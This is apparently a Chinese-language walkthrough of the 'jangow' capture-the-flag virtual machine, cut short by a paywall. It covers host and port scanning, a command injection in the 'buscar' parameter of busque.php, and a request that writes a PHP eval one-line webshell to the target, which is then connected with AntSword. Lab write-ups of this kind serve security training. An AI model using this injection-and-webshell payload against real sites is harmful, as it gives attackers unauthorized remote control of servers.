jangow 靶场完整解析
Koi
- 关注
收藏一下~
可以收录到专辑噢~
注意!
使用VMware可能获取不到IP,解决方案参考连接:
https://blog.csdn.net/qq_41918771/article/details/103636890
一、环境搭建
kali的IP地址:192.168.200.14
jangow靶机的IP地址:未知
二、信息收集
1.存活主机
netdiscover -r 192.168.200.0/24
可知目标IP 地址为 192.168.200.18
2.开放端口
nmap -A -p 1-65535 192.168.200.18
nmap -p 1-65535 -A -sV 192.168.200.18
80端口和21端口 开放
访问80端口
依次查看不同页面
buscar这个页面有问题,什么都不显示
buscar= 这算是缺少参数,尝试用命令执行,可以看到命令被成功执行
三、反弹shell
直接利用kali进行端口监听,反弹shell
bash连不上
nc 也是不行
常规的反弹shell方法都被限制了
用一句话木马写入,获取shell的方式反弹
http://192.168.200.18/site/busque.php?buscar=echo '<?php @eval($_POST['666']); ?>' >> shell.php
查看含有一句话木马的文件是否被写入到目标服务器
成功写入
连接蚁剑
成功连接
可试读前30%内容
¥ 9.9 全文查看
9.9元开通FVIP会员
畅读付费文章
畅读付费文章
最低0.3元/天
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Koi 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏

相关推荐
Noob 靶场完整解析
2024-03-23
Al-Web-1.0 靶机 渗透测试
2024-03-20
Vulhub 练习 DC-4靶机完整复现
2024-03-11
文章目录